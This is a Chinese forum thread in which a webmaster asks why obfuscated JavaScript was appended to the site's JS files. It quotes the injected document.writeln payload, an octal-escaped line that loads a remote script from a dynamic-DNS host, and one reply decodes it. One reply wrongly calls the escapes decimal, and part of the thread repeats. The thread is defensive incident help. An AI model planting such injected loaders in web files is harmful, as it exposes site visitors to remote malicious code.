网站里的js文件最后被嵌入恶意js代码解决思路
日期:2014-05-16 浏览次数:20454 次
网站里的js文件最后被嵌入恶意js代码
网站里的js文件最后被嵌入恶意js代码,不知道是什么原因,另外这段代码是怎么加密的:
document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
------解决方案--------------------
还没见过这样子的嵌入代码攻击,好像只是一串数字,想不到怎么应用。
------解决方案--------------------
这些是用10进制表示的UNICODE码,翻译成GB18030
网站里的js文件最后被嵌入恶意js代码,不知道是什么原因,另外这段代码是怎么加密的:
document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
------解决方案--------------------
还没见过这样子的嵌入代码攻击,好像只是一串数字,想不到怎么应用。
------解决方案--------------------
这些是用10进制表示的UNICODE码,翻译成GB18030
- JScript code
<script src="http://w%77w%33.d%64ns.%69nfo/%69%6E%66%6F%2E%6A%73"></script>
------解决方案--------------------
要怎么样彻底清除这个木马?
------解决方案--------------------
这个跟服务器有关
------解决方案--------------------
是服务器被恶意修改了~
------解决方案--------------------
是木马工具批量修改的,清理起来比较麻烦。最好有备份。
检查服务器的漏洞。
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
